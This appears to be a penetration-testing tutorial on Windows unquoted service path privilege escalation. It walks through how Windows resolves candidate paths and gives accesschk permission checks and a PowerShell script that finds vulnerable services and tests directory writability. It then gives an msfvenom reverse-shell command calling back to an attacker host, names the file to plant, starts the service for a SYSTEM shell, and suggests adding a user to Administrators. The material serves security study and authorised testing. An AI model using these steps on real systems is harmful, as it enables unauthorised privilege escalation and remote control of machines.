Unquoted Service Path

If a service's binary path contains spaces and is not enclosed in double quotes, Windows cannot tell where the executable name ends and its arguments begin, so it tries each space-delimited prefix of the path as an executable before reaching the real one. If we can write a binary to one of those prefix locations, the service runs it under the service account (usually LocalSystem).

C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

For that path Windows tries the following, in order, and runs the first one that exists:
C:\Program.exe
C:\Program Files\Unquoted.exe
C:\Program Files\Unquoted Path.exe
C:\Program Files\Unquoted Path Service\Common.exe
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
So we need write access to the directory that would hold one of the candidates (for Common.exe that is C:\Program Files\Unquoted Path Service\), plus a way to get the service (re)started.

#Check if we have permissions to start the service (look for SERVICE_START or SERVICE_ALL_ACCESS for our user in the output; if we cannot start it but its start type is Auto, the payload will run at the next reboot instead):
accesschk /accepteula -ucqv user unquotedsvc

#Check for write permissions in each directory that would hold a candidate file (-w lists only entries our user can write to; -d limits the listing to directories):
accesschk /accepteula -uwdq C:\
accesschk /accepteula -uwdq "C:\Program Files\"
accesschk /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
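The candidate-path logic and the directory write checks above, automated for every service on the host. This is an added example, not code from the original page; it uses only built-in cmdlets (Get-CimInstance Win32_Service, Test-Path, Split-Path), and the function names Get-UnquotedCandidate, Test-DirWritable and Find-UnquotedServicePath are my own. It complements accesschk rather than replacing it: accesschk reports the ACL, while Test-DirWritable actually attempts to create a file, which is the check that matters.

```powershell
# Added example (not from the original page): find services whose ImagePath is
# unquoted and contains a space, list the files Windows would try before the real
# binary, and test whether the current user can write to each candidate's directory.
# Run it as the low-privileged user being tested. Test-DirWritable creates and
# deletes a zero-byte probe file, so it does touch the filesystem.

function Get-UnquotedCandidate {
    # Return the paths Windows tries, in order, for an unquoted ImagePath.
    # For "C:\A B\C D\svc.exe" that is "C:\A.exe" then "C:\A B\C.exe".
    param([Parameter(Mandatory)][string]$ImagePath)
    $exe = $ImagePath.Trim()
    $idx = $exe.ToLower().IndexOf('.exe')
    if ($idx -ge 0) { $exe = $exe.Substring(0, $idx + 4) }   # drop any arguments
    $parts = $exe -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Test-DirWritable {
    # True if the current user can create a file in $Dir (probe file is removed again).
    param([Parameter(Mandatory)][string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePath {
    # One row per (service, candidate path). Paths under C:\Windows are skipped:
    # they are commonly unquoted but their directories are not writable.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^\s*"' -and
            $_.PathName -match ' ' -and
            $_.PathName -notmatch '^\s*[A-Za-z]:\\Windows\\'
        } |
        ForEach-Object {
            $svc = $_
            foreach ($candidate in (Get-UnquotedCandidate -ImagePath $svc.PathName)) {
                $dir = Split-Path -Parent $candidate
                [pscustomobject]@{
                    Service     = $svc.Name
                    StartMode   = $svc.StartMode
                    RunsAs      = $svc.StartName
                    Candidate   = $candidate
                    DirWritable = Test-DirWritable -Dir $dir
                }
            }
        }
}

Find-UnquotedServicePath | Format-Table -AutoSize
```

A row with DirWritable True for a service that runs as LocalSystem and that we can start (or that has StartMode Auto, for the reboot case) is the target; the Candidate column is the exact filename the payload must be given, since Windows stops at the first candidate that exists.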

#Create a reverse shell file
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=4444 -f exe -o Common.exe
#We use the name Common.exe because the next path element is the directory Common Files; with no quotes, Windows looks for C:\Program Files\Unquoted Path Service\Common.exe before the real binary. This works as long as none of the earlier candidates (C:\Program.exe, C:\Program Files\Unquoted.exe, C:\Program Files\Unquoted Path.exe) already exist, which is normally the case.
#Copy Common.exe into C:\Program Files\Unquoted Path Service\ (the directory we found writable above)
#Start the listener on the attacking host on port 4444, then start the service
sc start unquotedsvc
#You will get a shell as the service account (usually SYSTEM). The payload is not a real service binary, so the Service Control Manager kills it when it fails to report back (about 30 seconds); either act quickly (e.g. add a user to Administrators) or build the payload with -f exe-service instead of -f exe so it stays alive.
